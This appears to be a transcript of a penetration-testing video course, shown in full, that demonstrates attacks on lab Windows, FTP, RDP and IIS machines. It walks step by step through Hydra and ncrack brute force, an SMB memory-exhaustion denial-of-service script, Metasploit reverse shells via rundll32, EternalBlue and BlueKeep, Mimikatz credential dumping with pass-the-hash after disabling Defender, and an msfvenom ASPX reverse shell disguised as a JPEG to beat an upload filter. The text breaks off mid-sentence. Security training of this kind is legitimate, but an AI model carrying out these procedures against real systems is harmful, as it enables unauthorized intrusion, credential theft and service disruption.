passwords listed in it. Okay, so we've successfully enumerated a lot of SMB information from an active machine. In this demo, we'll conduct an SMB brute force attack. For this demo, we'll use Hydra. Hydra is a tool for cracking login password pairs. It supports many protocols, including SMB. We can quickly use Hydra to demonstrate just how simple it is to get unauthorized access to a remote system. Okay, to get started, I'm on my Kali Linux box, and this is version 2020.3. Let's take a look at the Hydra help file. So I'll type Hydra-H and press enter. And now scrolling up to reveal all of the options that we have. So we have the -L or -L pair. We're going to be using the -L and specify a file. So we can have a file with many logins in it. or we could just specify dash lowercase l for one particular login. Now we also have the dash P and dash capital P options, and they're similar to login. So dash P is a single password. Dash capital P is a file with a number of passwords in it. Now we'll also be using a couple of other options. So dash V is verbose mode. Dash capital V shows the login and password for each attempt. And dash D is debug mode. Okay, so let's go ahead. First I'll clear, and now I'll type hydra dash capital L and the file usernames.txt and dash capital P, and I'll specify passwords.txt. These are both on the local machine and they're in the current directory. And SMB : / 192.168.1.10, that's the target, and dash capital V dash lowercase v. Okay, so let's go ahead and press enter. Okay, we were successful, and we're told that 1 of 1 target was successfully completed with 2 valid passwords. Right, so we can see 1 valid password for the login administrator, and that password is capital P @ SSW0RD. Now scrolling up, I should see another one. And there we go. So the login for this one is jQuery, and the password is capital P @ 55W0RD. So that's it. We've successfully completed a brute force attack on a Windows Server machine with Hydra. In this demo, we'll conduct a denial of service attack against a server using the SMB protocol. The attack will run, consumes resources on a Windows target, and slows it down. I have a script that we're going to run on Kali Linux here. This is Kali Linux 2020.3, and it requires minimal changes. I simply added references to ensure that Python 3 is executing the script, and then I run it using sudo context. No additional modules were required. This script, by the way, is the same one used by Sam Bown at DEF CON 25 to demonstrate this DOS attack with my mods for Python 3. So let's go ahead and have a look at it. First, if I type LL in the home directory, which is an alias for ls-al, I'll see 2 files of note. There's smb-dos.py, which is a Python script, and smb.sh. Now, smb.sh is the script that we're going to run, and it actually creates the smb-dos.py script. Okay, so let's go ahead and have a look at smb.sh first. So I'll clear, and now I'll type nano smb.sh. All right, and a quick little shortcut to show line numbers in nano is Alt# or Alt-Shift-3 on most keyboards. Okay, so now looking at the script, we see all the echo commands because we're basically echoing this content into the smb-dos.py script. We're creating that script from this file. But from lines 9 through to 14, we're actually first checking to see if Scapy is imported. Now, Scapy is a Python 3 package, and I'll talk about that shortly here. But lines 17 through 18, basically what happens here is that we're adjusting the firewall to block outgoing RST packets because they're sent by the OS, since it doesn't recognize the raw packets forged and sent by Scapy. Okay, and then lines 20 through 23, we're getting input from the command line. And then lines 25 down through 55, we're actually running the SMB denial of service attack. Now, line 56 is self-explanatory, sleep for 2 seconds. Now, lines 57 down through 66 basically runs 10 threads to make the attack progress faster. Now, one other thing that is important to note here, on line 52, we have 4 bytes, and these 4 bytes are added to the payload of the final ACK packet. And these 4 bytes initiate an SMB request, causing the SMB server, which is our Windows target, to reserve 128 kilobytes of RAM. However, since the request is never finalized, this results in RAM being wasted on the server. One other thing is that it's important to note that this script makes 90,000 connections to port 445. Okay, and Scapy itself, again, is a Python-based packet manipulation library, and using it in the script we can forge packets for SMB. Okay, so I'll press Control X to exit out of Nano Editor. And now I'll type nano smb-dos.py to see the Python script that gets created by the script file and then run. And again, Alt-Shift-3 to show the line numbers. So again, lines 1 and 2, we're importing libraries that we need, including Scapy. Then in P0, we're setting up counters. Then we're setting up the sockets in 6 and 7, the destination, IP, and port from lines 9 through 12. Then all the magic happens from line 14 down through 25. So here, basically, what we're going to do is we're going to make 90,000 connections to port 445. And again, looking at line 24, there's our 4 bytes to initiate the SMB request. Okay, so I'll press Control X to exit out of here. Now I'll clear. And now let's run smb.sh. So that's sudo./smb.sh. Okay, now I'll enter my password for Kali. Now the remote host IP is 192.168.1.85. And this is a Windows 7 64-bit machine, by the way. So I'll press enter. How many threads are we going to use? Let's type 90,000 and press enter. Okay, and now I'll quickly switch over to my Windows 7 64-bit machine. Okay, here I am on my Windows machine. Down on the taskbar, I'll right-click. I'll select Start Task Manager, and I can see memory ramping up if I'm on the Performance tab. Okay, I'll maximize Task Manager. And I'll see that physical memory usage is continuing to ramp up to almost 100%. So basically what we've done here is we've managed to consume the memory resources almost fully on this machine. Now, with a couple of other attackers involved, we may be able to actually break this machine entirely. However, as it stands right now, things are going to be slowed down sufficiently that an administrator may have to restart the machine, may have to re-log in. So at that point, we can monitor and grab their login credentials. Okay, so we've successfully conducted an SMB Denial of Service attack on a Windows host. In this demo, we'll exploit a Windows system to gain a reverse shell on it. To get started, I've signed into my Kali Linux box, and this is Kali Linux 2020.3. The first thing that we'll have to do, you may have to actually first activate Metasploit if you haven't activated it already on your version of Kali Linux. And to do that, you first want to get PostgreSQL database server up and running. PostgreSQL database is installed on Kali Linux, but not necessarily started. So we can start the service using the systemctl command. So I'll type sudo systemctl enable -- now PostgreSQL, and I'll press enter. I'll enter my Kali Linux password. Okay, so now it seems like it's started. Let's just double check. So I'll type systemctl is -enabled PostgreSQL, and it reports that it is enabled. So now I'll clear. Okay, and now once the PostgreSQL database server is running, we'll proceed to initialize the Metasploit PostgreSQL database. This will create and initialize the MSF database. So I'll type sudo msfdb init and press enter. Okay, database is already started. Database appears to have already been configured, so it skips initialization for us. Okay, good. So let's clear. And now let's start Metasploit Framework console. That's MSF console. So that's sudo MSF console. Okay, so it's running now. I'm at the MSF5 prompt. So now, first I'll clear. All right, now we're going to use run DLL32.exe. This is a Windows utility that we can use to invoke a function exported from a DLL. So we'll basically launch the run DLL32 attack via SMB delivery of Metasploit. So Metasploit includes this SMB delivery module, which we can leverage to generate this malicious DLL file. The SMB module delivers payloads via SMB server, and it includes commands that can be used to retrieve and execute payloads. So now we'll issue the use command, use exploit /windows/smb/smb_delivery. Okay, so now no payload was configured, so it defaults to the Meterpreter reverse TCP payload. It's okay the way that it is. Now we need to also set the server host, and I know that this Kali Linux box has an IP address of 192.168.1.88. So I'll type set srv host 192.168.1.88, and now I'll type exploit. Okay, now we'll run this malicious code through run DLL32.exe on the victim machine. And this will help us obtain a meterpreter session. So now I'm going to switch over to my Windows 8.1 machine. Okay, here I am on my Windows machine. And now I'll go down to the taskbar and I'll click to bring up PowerShell. Okay, now in PowerShell, I'm going to issue the run DLL32.exe command. So the command that was back on the Kali Linux box is run DLL32.exe // 192.168.1.88 capital D, lowercase k, capital B, lowercase b, /test.dll, 0. Now I'll press enter and then I'll quickly go back to the Kali Linux box where we'll be greeted and rewarded with the reverse shell. Okay, back on the Kali Linux box, I see that Meterpreter session 1 has been opened. So I'll press enter and I'll open session 1 by typing sessions 1. Okay, and now my Meterpreter session is open. Now at this point, I should be interacting with the Windows 8.1 box. So if I type sysinfo, I'll see that lo and behold, I do have the reverse shell on my Windows 8.1 machine. So we've successfully used SMB delivery from Metasploit to gain a reverse shell on a Windows system. In this demo, we'll execute remote commands with PsTools. Okay, to get started, I've signed into a Windows 7 machine, and I've opened 2 different documents with Notepad. We'll see these processes later remotely. I'm going to be connecting to this machine from a Windows 8 machine. So I'm going to go over to the Windows 8 machine right now. All right, over on my Windows 8 machine, I've opened the browser and I've navigated to docs.microsoft.com/en-us/sysinternals/psexec. Here's where you download all the PsTools. So you click the download PsTools link, download the zip file, then extract it, and then you use the utilities directly from the files that are extracted. Now I've already done that. So I'm going to go down to the taskbar. I'll click Windows Explorer to bring up my downloads directory. And here are the PsTools that I downloaded. And I expanded them into the PsTools directory here. So I'll double click to drill down into PsTools. And there are all the utilities that come in PsTools. Now we'll use a couple of these tools, not all of them, but we'll use a couple of the interesting ones. So let's go ahead and do that right now. The other thing that I've done on this machine, I've opened 2 PowerShell terminal sessions side by side. I've also navigated in each one to downloads PsTools because this is the directory that contains all of the PsTools that we're going to use. Okay, so first on the left-hand side, I'm going to do a psexec into the remote Windows 7 box, and I'll launch a command prompt. So to do that, I'll type psexec followed by the IP address of the target machine. So you specify / and then the IP address, which is 192.168.1.85. Now I'll specify the user, and that's Joe, and I'll also specify the password. So I'll specify a -p flag, and I'll specify the password, which is just password, and I'll tack on CMD on the end to bring up a command prompt for the remote machine. So let's go ahead and do this. All right. So now if I type systeminfo, I'm interacting with the remote machine. So I should see Windows 7, and I do. Windows 7. All right. Now the other thing that I can do here, remember the 2 copies of Notepad that I had running. Well, let's type task list, and this will give us a task list on the remote machine. Now this is not one of the PS utilities. This is just the task list utility on the remote machine. Okay, we can see 2 copies of Notepad running, and make note of the process IDs, the PIDs, 388 and 1924. We can kill those processes remotely with the pskill utility. But before we do that, let's use a couple of the other commands. Okay, so over on the right side, again, I'm still in the PsTools directory. I'm going to use psloggedon. So I'll type psloggedon, and I'm using tab to autocomplete. And so that's psloggedon.exe. Now I specify the IP address of the remote machine, and that's just, again, 192.168.1.85. And press enter, and it shows 1 user logged on. So now let's clear. And now let's go ahead and kill one of those processes. And to do that, I use the pskill utility. So I'll start typing pskill and I'll autocomplete. So that's pskill.exe, and I need the ./ in front of it. And -t, which tells pskill utility to kill the child processes as well. Now again, the familiar IP address, which is 192.168.1.85. And -u for the user, and I'll specify the user, and I'll specify the password. So that's -p, and password is password, and now the PID. So let's kill PID 388. And I'll press enter. All right, and pskill reports the process was indeed killed. So now let's go over to the left-hand side. Let's get another task list. So I'll type task list, and now I'll see that I only have the one copy of Notepad running. Okay, and if I want to filter that out more clearly, what I can do is I can just type task list and pipe that into the find string command, and I'm going to look for Notepad. So I'll type Notepad and press enter. And again, it only lists the one. Okay, so it's just a quick and easy way to filter those processes out. Okay, now over on the right side again, another interesting utility from PsTools is PsPassword. With PsPassword, we can change a user's password remotely. So to get started doing that, in the right-hand PowerShell window, I'll type Pass, and I'll press tab to autocomplete, and I'll specify the IP address, which again is 192.168.1.85. Then I specify the user whose password I want to change, no flags, just the username, and I'll specify the new password. So I'll specify password, and we'll add an exclamation onto the end. Press enter. Okay, so we've successfully changed the password. All right, so we've successfully executed remote commands with PsTools. In this demo, we'll pass the hash using Mimikatz. There are two machines I'm going to use for this demo. First, I have a Windows 10 machine, and I also have a Windows Server 2019 machine. So right now, I'm on the Windows Server 2019 machine, and I have the Mimikatz archive expanded so that I can use it here to obtain the NTLM hash for the administrator on this machine. We need that in order for us to be able to pass the hash using Mimikatz, right? And we're actually going to use Mimikatz on this machine to extract the NTLM hash. Now, I also have a Windows 10 machine, so I'm going to pop over to the Windows 10 machine for a second. Okay, so here I am on my Windows 10 machine. Now I have my browser open because I wanted to show you where I got PsTools from. So it comes from docs.microsoft.com/en-us/sysinternals/downloads/PsTools. Okay, so I've already downloaded the PsTools suite and I've expanded the archive. And over on the second tab, I can download the mimikatz_trunk.zip. And this is the Mimikatz tool that I've already downloaded. So I'm not going to download it again. All you need to do is download it and expand it. You can get this release from github.com/gentilkiwi, gentle kiwi, /Mimikatz with a Z, /releases. Okay, now in both cases, you have to have Windows Defender totally turned off because Mimikatz is recognized as a virus signature by Defender and virtually any other antivirus program. Now, I'll expand the notification area and I'll click to bring up Windows Defender Security Center. And I just wanted to demonstrate that I have firewall and network protection turned off, account protection turned off, virus and threat protection turned off. And if you go in here and you look at the threat history, you'll see that, for example, I have no threats right now and quarantine threats, but I had all kinds. So basically, every time this happens, I have to come in here and tell Defender to allow this file, right? This Mimikatz executable. So again, that's turning everything off. And we need to do that in order to use Mimikatz. Okay, so here on Windows 10, what we're going to do to get started is we're going to go ahead and try to run PsTools on our remote server. So now down in the taskbar, I'll right-click the PowerShell icon and I'll select Run as Administrator. Now I have to enter my local administrator's password and I'm in. Okay, now I'm going to cd into my user directory. And if I do a listing, I can see that I've got my PsTools expanded here, and I've got Mimikatz _trunk expanded here as well. Okay, so I'm going to clear again, and I'm going to maximize the PowerShell window. Okay, to start with, let's try to run psexec from here. So /pstools psexec.exe, now // and I'll enter the IP address for the server, which is 192.168.1.10. And at the end of this command, I'll type cmd.exe because that's the command prompt that I want to run on the remote server. So let's go ahead and try that. Okay, and we get an error and it tells us that we can't access the shared folder because of security policies blocking unauthenticated guest access. Okay, so I'm going to clear here. Let's just keep that in mind. So we weren't successful, so let's see what we can do to make this happen. In fact, what we can do is to execute a pass the hash attack. Okay, so now I'm going to switch back over to the server for a moment. Okay, and now here I am on the server. If I go down to the taskbar, I'll see that I have Server Manager open. So just to show that this is Server 2019. Okay, so now back to PowerShell. Now at this point, what we need to do is run Mimikatz, and we need to get the NTLM hashed password for the administrator. So let's go ahead and do that. So from here, I'll type /Mimikatz _trunk. It's in that directory under downloads and under x64, so /x64, and the name of the executable is mimikatz.exe. So /mimikatz.exe. Now I'll press enter. All right, now I want to issue a command to get debug privileges. And to do that, I type privilege : debug, and everything seems okay. So now I need to issue a secure LSA : logon passwords command. So let's go ahead and do that. Okay, now let's scroll back up to the top and let's grab the credentials for the administrator. Okay, so here's the NTLM hash for the administrator's logon password. So I'll highlight it and I'll right click to copy that. Okay, so now with this, let's go back over to our Windows 10 machine. Okay, so here I am on my Windows 10 machine. Now recall just a few moments ago that when we tried to run psexec, we got that error, right? We couldn't access the machine because of the security policies. So now let's see if we can get around that. Okay, so to start with, we'll run Mimikatz here. So that's /Mimikatz _trunk x64 /Mimikatz.exe, and I'll press enter. Okay, and we see that we have a threat found again. So let's go down to the notification area and bring up Windows Defender Security Center. Now I'll go into Virus and Threat Protection, and I'll look at Threat History. We'll see that we now have a quarantine threat. So I'll click the down arrow under High, and I'll click Restore. Now I'll have to enter my password for the local administrator account. Okay, so now we can use that file again. Okay, so now I'll clear. And now I'll up arrow to bring that command back. So now we're running the Mimikatz tool. So at this point, what we need to do is issue the privilege debug command again. So that's privilege : debug, and everything's okay. So now we need to enter a secure LSA : path command. And what this is going to do is it's going to allow us to run a command prompt run as administrator in the corp.internal domain, because that is the password, the NTLM hash password that we grabbed. Okay, so let's go ahead and enter this command. So it's secure LSA : pth /user, and the user's administrator /domain : and the domain is corp.internal /NTLM : and now we'll right click to paste that NTLM hashed password in here. Okay, so I'll right click to paste the hash in, and now we'll tack a command onto the end, /run : CMD. So let's go ahead and do this. Okay, and now we have a new command prompt. Okay, so now we're still not connected to the remote machine. So now at this point, let's see if we can run PsTools. So I'll go to my users download directory, and I'll clear. I'm in the command prompt, and command prompt doesn't recognize the word clear. It's just CLS here. All right. So now with a clear prompt, let's go ahead and run PsTools psexec. Okay. So it's PsTools /psexec.exe, and we have to specify the remote machine, and that's our server, and it's / 192.168.1.10, and CMD on the end because we want to run a command prompt. Okay, so let's go ahead and press enter. All right, so we should now be actually accessing the server from here. So now if I type system info here, I should see system info for my server 2019 machine, and that will tell us that we've successfully performed a pass the hash attack. Okay, so let's go ahead. So I'll type system info. Okay, now scrolling all the way up, I'll see that yes, indeed, we are actually interacting with the server 2019 machine. Okay, so we've successfully performed a pass the hash attack using Mimikatz. In this demo, we'll conduct an attack on a system using the EternalBlue vulnerability. Okay, to get started, I've signed into Kali Linux, and this is Kali Linux 2020.3. The first thing that I'm going to do is just check that PostgreSQL has been enabled, because we'll be using Metasploit framework for this demo. So I'll type systemctl is-enabled PostgreSQL, pressing enter, and it reports that PostgreSQL has been enabled. Okay, so let's clear. All right, so now we can start MSF console. So I'll type sudo MSF console, press enter. I'll enter my Kali Linux password, and Metasploit framework has started. Okay, so now let's do a search for EternalBlue. So at the MSF5 prompt, I'll type search space EternalBlue. Okay, and that turns up a couple of options. Now we're going to choose option number 2. To interact with that module, I'll type use exploit /windows /smb /ms17_010_EternalBlue. Okay, and I'll press enter. Okay, so no payload was configured, so it defaults to the right one, which is Windows x64 Interpreter Reverse TCP. Now let's check out what kind of values we have for the configuration. So I'll type options. Okay, so the exploit target is going to be Windows 7 and Server 2008 R2, so we're using Windows 7. Keep it simple. We have the L host and L port set. We have the R port already set. It's 445, of course, SMB, but we need to set our hosts. And our Windows 7 box has an IP address of 192.168.1.85. Okay, so let's go ahead and do that. I'll type set our hosts 192.168.1.85 and pressing enter. So now I can run this exploit. So I'll type run. Several things are going on here now. We see an SMB connection is established, and we also see that an exploit packet is being sent. And finally, we see in caps on the second last line win, and a Meterpreter session is open. So let's just confirm that the exploit has been successful by typing sysinfo. This should give us Windows 7 information. And it sure does. So we've successfully exploited a Windows-based system using the EternalBlue vulnerability.
In this demonstration, I'm going to show you how we can enumerate information from an FTP server. To do this, I'm going to be using Kali Linux as my attacking machine, and I have an FTP server running on Ubuntu server that I'm going to be attacking. So our first step is going to be opening a terminal. Once we have a terminal open, I'm going to use Nmap for my initial information gathering. And I'm going to specify -p to tell Nmap to only look at port 21, because FTP runs over port 21. And since I'm not interested in anything else, I don't want to waste my time scanning or trying to enumerate any other ports or services. And then I'm going to point it at my FTP server, the address of which is 192.168.2.10. Then I'm going to hit enter and let the scan run and complete, and we'll see what the output looks like. Okay, and we can see Nmap has completed, and it's found port 21 TCP is in the open state, and it's telling me that's an FTP server, which is useful if you're not sure what port it is. But what this is telling me is there is an FTP server running, because that port would not be open if there wasn't. So now I've gained the knowledge that there is most likely an FTP server for me to attack. So my next step is going to be to launch Metasploit. And now we have a terminal open running our Metasploit program. And there are lots of different FTP modules that are out there in Metasploit, and we can find them by saying search FTP. And what this does is it gives us a list of all the different modules that have FTP in their name, indicating they are related in some way to FTP. And we're going to use a specific one for enumerating, which is found in auxiliary scanner FTP anonymous. So we're going to use that command, use auxiliary scanner FTP anonymous, and that loads up the module for us. And if we say show options, it will tell us what we need to set to run this module. So FTP pass and FTP user we can leave. They are set for us already and they're not required. The remote port is set to 21. Threads is set to 1. We see we have remote hosts as an option, and there's no current setting because the field is blank. But it is required for us. So we need to set that remote host. And that remote host is going to be set to the FTP server we want to enumerate. So I'm going to say set our hosts 192.168.2.10, which again is the IP address of our FTP server. So now if I say show options again, the our host field is filled in with the IP address of our FTP server. And now I'm going to run the module by using the command exploit. Okay, so the module has completed, and what this module is doing, it's trying to scan the FTP server to see if anonymous logins are allowed. And if anonymous logins are allowed, it would tell me here. But unfortunately with our FTP server, anonymous login is not allowed. That's a good thing from a security perspective. From an attacker's perspective, it's a bad thing because that's a very easy method of gaining access to an FTP server. But we're not done trying to find information about the FTP server. We have now found one thing out. The configuration does not allow us to do anonymous logins. The next module we're going to use can be found in use auxiliary scanner FTP version. Once again, I'll say show options, and we see the same options available to us as before. Once again with the remote hosts field set to blank by default, so we have to set that ourselves. So I'll say set remote host 192.168.2.10, and I'll say show options again to make sure it's filled in, and it is. And now I will run this module, which will try to get the version of FTP that's running on the FTP server back for me. Okay, and the exploit has completed, and we can see it's come back with information about the FTP banner. So I can see it's running VS-FTPD version 3.0.3. Now with this knowledge, I can start to go and research vulnerabilities associated with that particular VS-FTPD program and that specific version 3.0.3. And now I can start to go about crafting my attack. I have much more knowledge about the target than I did going into this. In this demonstration, we're going to show how to conduct a brute force attack against an FTP server. To do that, we're going to be using Kali Linux as our attacking machine, and we are going to be attacking an FTP server running on Ubuntu. So to start with, the first thing we need is to verify that we have an FTP server to attack. So I'm going to open a terminal, and I'm going to use Nmap, and I'm going to use the argument -p to specify searching on port 21, which is the port that FTP uses. And I'm going to give it the IP address of the suspected FTP server, which is 192.168.2.10. And if an FTP server is running, we should expect to see this port be in the open state. And our Nmap scan has finished, and we see the result is on port 21, the state is open. So we're very confident that there is an FTP server up and running at that IP address. So with that out of the way, now we do know that we have an IP address with an FTP server to attack. So our next step is to create our brute force files. Now, brute force files are a combination of usernames and passwords. There are many different pre-made brute force datasets out there that just have a list of common usernames and common passwords. In this video, we're going to be using our own because we are just going to be using a very small sample. So I'm going to make these files on our desktop. And the first file we're going to make is our usernames file. So I'm going to go use a text editor. In this case, I'm going to use Nano, but you can use whatever text editor you are comfortable with. And I'm going to call this usernames.txt file. And in this file, I'm going to put a list of common usernames that I want to try. So let's say things like root, admin, administrator, guest, and tech. And we'll save that. So we can see that on our desktop, we now have our usernames.txt file. And now I'm going to do the same thing, but for my passwords.txt file. And this is where I'm going to put in common passwords that I want to try. So I'm going to try things like password, football, hunter2, password1 exclamation mark, password1 exclamation mark with a capital P, soccer. So then we'll save that. And we can see now on our desktop there is a passwords.txt file and a usernames.txt file. So these are files that we're going to use in our brute force attack. And what is going to happen is every combination of username and password and every permutation of username and password is going to be used when trying to connect to this FTP server. And if any are successful, it will tell us. The tool we're going to use to perform our brute force attack is known as ncrack. So if I just type ncrack into a terminal on Kali Linux, we see a large output in the terminal giving us information about how to use this program. Now there are a lot of different options that you can use if you are getting more in depth, but for our purposes, we're interested in the -U argument, which points to the username file, and the -P argument, which points to our password file. So the command we're going to use to perform our brute force attack is ncrack -U, and then point to our usernames file, and then -P, and point to our passwords file. And then we're going to give the address of our FTP server. So that will be ftp://192.168.2.10. And then we'll hit enter and see if any of our passwords come back successful. And our ncrack command has now finished. And we see here, just below the message telling us that ncrack has started, there's a line that says discovered credentials for FTP on 192.168.2.10. And then below that line, it tells us the username that has been successful is tech and password 1 exclamation mark. So now our brute force attack has been successful. It's successfully found a set of credentials. So we can attempt to connect to that FTP server and use those credentials. So tech and password 1 exclamation mark. And we see it's successful. So now we have cracked access into the FTP server, and we can freely upload or download files as we wish based on the permissions set out by that FTP server. In this video, we're going to exploit a dynamic web page created using the ASP.NET framework, and which is hosted in an IIS server. So our first step will be to actually browse to our website and see what we're dealing with. And the IP address of the website is 192.168.2.11. And we can see that when we navigate to it, we're met with a directory listing. And we have a few different items here that we can look at. There are 3 directories, but what's more interesting to us is this webform1.aspx file, which is what's going to generate a dynamic web page for us. So let's click on it and see what it presents to us. And it brings us to a file upload location, which is great from an attacker's point of view because any kind of misconfigured file uploader could be a way for us to gain access. So we're going to make use of this file uploader to execute a malicious ASPX script and gain access to this web server. So we'll come back to this website in a minute, but for now, let's switch over and create our malicious file that we're going to upload to the web server. The tool we're going to use is called MSFvenom. So if I go to a terminal and I type in msfvenom-h in a Kali Linux machine, then I get this output showing me all of the different options that I can use with this program. The interesting ones to us, and the ones we're going to use today, are -p, which stands for payload, and that's going to be the payload that we want to use. -f, which will be the format we want to output our malicious payload in. And -o, which will specify the name of our output file. So the command that we'll actually be running is msfvenom-p, and the payload we're going to use is Windows/interpreter/reverse TCP. And then we need to specify for the payload what our IP address is, so it knows what to connect to. So the way we do that is by saying lhost equals 192.168.2.9, which is the IP address of our current machine, our Kali Linux machine. And then we need to give it the port that it will be connecting on. So let's give it lport equals 4444. And then we need the format that we want it to be in. So we'll say -f ASPX file. And then we'll give it an output name, and we'll call it reverse shell.aspx file. And then we hit enter, and our payload is created for us. So if I were to do an ls command now, in our directory, we can see that there is a reverse shell.aspx file available to us. Now, many file uploaders on dynamic web pages across the internet will check file extensions for validity to make sure that people aren't uploading things like ASPX files. A common file extension that is almost always accepted is .jpeg. So what we're going to do is disguise our .aspx file as a .jpeg. And the way we're going to do that is we're going to use the cat command, which will output any file echoed into the terminal as text. And we're going to use a valid picture on our desktop called pic.jpg. And then we're going to follow that with our reverse shell.aspx script. So that will output one after another the text of the JPEG and then the text of the ASPX file. And we're going to output that into a single file, and we'll call that reverse hack.aspx::.jpg. And what that syntax will do is a file checker will look at the end of the file and see this .jpg. And it'll go, okay, that's a picture, that's a .jpeg. This is a valid file, we'll allow it to upload. But the operating system, when interpreting that file, will stop at the semicolon and interpret it as a .aspx file. So it'll appear to be a valid JPEG, but under the hood we'll have this malicious script running that will connect back to us. So if I run that ls command once again, we can now see we have two files in our directory, the original reverse shell.aspx file and our new reversehack.aspx::.jpg file. And this is the file that we're going to be uploading to our web server. So we can go back at this point and upload that file. So I will go browse, and I'm going to upload that file we just created. And I click upload, and it tells me successfully, your file was saved as reversehack.aspx::.jpg. And if I go back to the main directory, I can see my file is there. So when I click on this file, it's going to execute that script and connect back. But before I do that, I need to set up a listener in Metasploit. So our next step will be to open up another terminal and start a Metasploit instance. So I will run the command msf-console. And that starts Metasploit for us. To set up a listener, we're going to say use exploit/multi/handler. And that will set up a handler for our connection. I'm going to set up the payload to match the payload that I created in the ASP script. So I'm going to say set payload windows/meterpreter/reverse TCP. And then I'm going to run the command show options. And we can see that these are the options we need to set in order to run this exploit. Some of it's already set for us. If we look at the local port, it's already set to 4444, which is what we set in our ASP script, so that's good to go. But we do need to set the L host. So that is going to be set to the IP address of our local machine. So I will run the command set lhost 192.168.2.9, which is our IP address of the Kali Linux. And then I'll run show options again. And we can see now the IP address is set. So I'll clean up my terminal. And now I can run the command exploit to set up my listener. And we can see it started a reverse TCP handler on 192.168.2.9 on the port 4444. And at this point, I'm ready to go back to my website and execute my script. And now I'll click on this file. And to the naked eye, everything appears normal. We have opened up a picture has loaded, nothing malicious seems to have happened. But we know that under the hood, our malicious script has run. So I will now minimize this and go back to our listener, and we see that it's been connected to, and we have a meterpreter session now. And the meterpreter session is telling us that our localhost 192.168.2.9 is connected to 192.168.2.11, which is the target that we wanted to attack. So I will change to the root directory, and then I will do a ls. And we see this is not a directory on our machine, this is a directory on the target. And we have access to their file systems. We can start to steal data, upload more malicious files, really do whatever malicious acts we want to do. And the target is completely compromised. In this video, we're going to show how you can enumerate an RDP server in order to get information about the version and settings of that RDP server. In this case, we have an RDP server running on IP address 192.168.2.11. But the first thing that we're going to do is verify that it actually exists and is running. So to do that, we're going to use Nmap. So I'm going to open up a terminal and run the command nmap-p to specify the port that I want to scan. And I'm going to specify port 3389 because that's the port that RDP runs on. And then I'm going to give it the IP address of my RDP server, which is 192.168.2.11. And what Nmap comes back and tells us is that on port 3389, the state is open and the service is ms-wbt-server. So there's a good chance that there is indeed an RDP server running. With that knowledge in mind, I'm going to continue using Nmap to further enumerate the server. If you ever need help with Nmap commands, you can run nmap-h, and it will come out with a list of the most common arguments and commands that you can pass to it. So for example, we can see that -p argument that I used is here to specify the port range, only scan the specified ports. And what I'm going to use now is this -- script option to provide Nmap with an example script to run to get information out of the RDP server. So once again, my command will be nmap -p 3389, once again to tell it to look for RDP. And then I'm going to use -- script, and I'm going to use the script RDP -enum -encryption, and then once again pass the IP address of the RDP server, 192.168.2.11. And now Nmap returns to me more information. So below the result that we had seen previously, which was that port 3389 is in the open state, we now have information about the encryption implementation of the server. So we can see in the security layer, we have cred SSP success, cred SSP with early user auth success, native RDP success, RDSTLS success, SSL success. And at the RDP encryption level, we can see 40-bit RC4 success, 56-bit RC4 success, 128-bit RC4 success, FIPS 140-1 success. And then we have some guesses at the RDP protocol version, RDP 5.x, 6.x, 7.x, or 8.x server. So now we have a lot more information to go on. And what we can do is start to research some of these different encryption levels and security layers to see, are any of these encryption implementations weak or outdated, and therefore we could break them. Maybe if a server is using TLS improperly with improper certificates, we might be able to find a weakness there. And by knowing roughly what the RDP protocol version is, we could start to see if there are any vulnerabilities associated with that version. So this script really allows us to gain a lot of information with a minimal amount of effort about an RDP server. Now we can go a little bit further to check for one extra vulnerability. And to do that, I'm going to start up Metasploit by running the command msf console. And then I'm going to use a specific module, which is auxiliary/scanner/rdp/ms12_020_check. And we can run the command show options once we've loaded that module to see what we need to set. And what this will do is come back and tell me if the host is vulnerable to this specific vulnerability or not. And either result is good information. If the host is vulnerable, then I have an attack pathway that I can go on to try to exploit the host. If the host is not vulnerable, then I know that I don't need to waste my time trying to follow down that avenue of attack approach. So I'm going to set our hosts 192.168.2.11, which is the IP address of the RDP server. And now if I run show options again, I can see that our host has been set to that IP address. Our port, I don't need to change because 3389 is the default RDP port, and that's the one that I want to check. And then I'll go and use the command exploit. Okay, and the exploit has finished. And what this is telling me is that the host is not vulnerable. If the host was vulnerable, it would come up with an explicit message saying, yes, it's vulnerable to this vulnerability. But it hasn't done that, so now I know, okay, I don't need to look for this particular vulnerability, time to move on. And that's how we can use these enumeration scripts to find out information from an RDP server. In this video, we're going to demonstrate exploiting a vulnerable Windows machine using the BlueKeep exploit, which takes advantage of a weakness in the RDP protocol. So to do that, we're on our attacking machine, which is running Kali Linux, and I'm going to launch a terminal and start up Metasploit. So to do that, I'll use the command msf console. And now we have our Metasploit session. So we want to load up the BlueKeep module, which is going to be in Use, Exploit, Windows, RDP, CVE 2019-0708 BlueKeep RCE. And by default, it will configure with a payload using the Windows Meterpreter Reverse TCP. So now I have the module loaded. Let's show our options. So we see quite a few different options here. Our local host is already set to the proper IP address, which is the IP address of this machine, the attacking machine, 192.168.2.9, but the remote host is not set yet. So we're going to set the remote host to the IP address of the Windows machine that we want to attack, which is 192.168.2.13. That's the Windows machine that has a vulnerable RDP server running on it. And then we also need to set the target. So I'm going to say show targets as a command, and that gives us a list of all the targets available for this payload. So the Windows machine that's running is a Windows 7 machine running on VirtualBox. So in that case, we're going to use target 2, which is VirtualBox 6, Windows 7. If you were hosting your virtual machine on a different type, such as VMware or Hyper-V or AWS, then you would use a different target suitably. Alternatively, if you have Windows 7 running on hardware, then you would use target 1. So to set the target, I say set target 2. And now I'm going to show options once more to make sure that all my settings are like I want them to be. So I check my rhosts and it looks correct. And then I check my local host and that looks correct. I don't need to change the local port. That should be fine. And then my exploit target is set to 2. So we're ready to run the exploit. So I type exploit and I run it. And the exploit starts to run. And this takes a little while to actually execute. But once it's executed, we can see that we have a Meterpreter session opened on our target machine. So we've successfully exploited it using the BlueKeep exploit. Now, there are a few things that can go wrong in the exploit and cause you not to have a session. One such setting is the groom size. In my exploit, I had the groom size set to 250 megabytes, but depending on the timeout that you have configured for your RDP server, this might cause a connection timeout error, or it might cause your exploit to fail for other reasons. So if that happens, you could try changing the groom size by using the command set groom size 50 or 100, or play around with it to try and find different values that might work for you. And what this will do is change the size of the chunks that the exploit sends to the RDP server. The other thing that we could do in order to try and make the exploit work if it fails is to change the starting memory location of the non-paged pool of memory. So to do that, we would open up in a text editor the actual code of the exploit, which will be in the path user, share, Metasploit framework, modules, exploits, Windows, RDP, CVE, 2019-0708 BlueKeep RCE. And this is the actual code for the exploit. And if we scroll down to the line that says this works with VirtualBox 6, we can see variable groom base is set here, and it's set to a memory value. Now that memory value is unique for every virtual machine. So in order to get it, you have to take a memory dump of the virtual machine and analyze it using a program like Recall in order to find the address value for that groom base. But once you have that memory address, you can put that into 